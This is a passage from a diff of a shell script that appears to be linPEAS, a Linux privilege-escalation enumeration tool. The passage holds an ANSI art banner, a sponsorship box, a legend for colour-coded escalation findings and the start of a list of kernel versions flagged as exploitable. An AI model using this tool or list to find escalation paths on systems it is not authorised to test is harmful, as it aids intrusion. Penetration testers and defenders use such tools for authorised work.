8;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m
+ \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m
+ \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m
+ \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m
+ \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m
+ \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m
+ \e[48;2;51;78;45m \e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m
+ \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m
+ \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m
+ \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m
+ \e[38;2;54;79;47m▀\e[38;2;72;123;60m▀\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[0m\e[38;2;44;65;38m▀\e[38;2;31;48;27m▀\e[38;2;31;48;26m▀\e[38;2;31;52;25m▀\e[38;2;41;71;34m▀\e[38;2;59;97;50m▀\e[0m
+ \e[38;2;95;106;94m▀\e[38;2;81;137;65m▀\e[38;2;91;166;73m▀\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[0m\e[38;2;28;50;23m▀\e[38;2;20;22;20m▀\e[0m
+ \e[38;2;41;52;39m▀\e[38;2;39;76;30m▀\e[38;2;73;136;57m▀\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[0m\e[38;2;53;97;41m▀\e[38;2;24;44;19m▀\e[38;2;36;41;35m▀\e[0m
+'";
+ else
+ echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m
+ \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m
+ \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;65m \e[49m
+ \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m
+ \e[48;5;23m \e[48;5;214m \e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m
+ \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m
+ \e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m \e[48;5;65m \e[49m
+ \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m
+ \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m
+ \e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[49m
+ \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m
+ \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m
+ \e[48;5;108m \e[48;5;107m \e[48;5;59m \e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m"
+ fi
+ fi
+}
+
+
+print_support () {
+ printf """
+ ${GREEN}/---------------------------------------------------------------------------------\\
+ | ${BLUE}Do you like PEASS?${GREEN} |
+ |---------------------------------------------------------------------------------|
+ | ${YELLOW}Get the latest version${GREEN} : ${RED}https://github.com/sponsors/carlospolop${GREEN} |
+ | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} |
+ | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} |
+ |---------------------------------------------------------------------------------|
+ | ${BLUE}Thank you! ${GREEN} |
+ \---------------------------------------------------------------------------------/
+"""
+}
+
+###########################################
+#-----------) Starting Output (-----------#
+###########################################
+
+echo ""
+if [ ! "$QUIET" ]; then print_banner; print_support; fi
+printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC;
+echo ""
+printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC"
+echo ""
+printf ${BLUE}"Linux Privesc Checklist: ${YELLOW}https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist\n"$NC
+echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m,"
+echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW},"
+echo " RED: You should take a look to it" | sed "s,RED,${SED_RED},"
+echo " LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN},"
+echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE},"
+echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN},"
+echo " LightMagenta: Your username" | sed "s,LightMagenta,${SED_LIGHT_MAGENTA},"
+if [ "$IAMROOT" ]; then
+ echo ""
+ echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW},"
+ sleep 3
+fi
+echo ""
+printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC"
+echo ""
+
+###########################################
+#---------------) Lists (-----------------#
+###########################################
+
+filename="$SCRIPTNAME.txt$RANDOM"
+kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 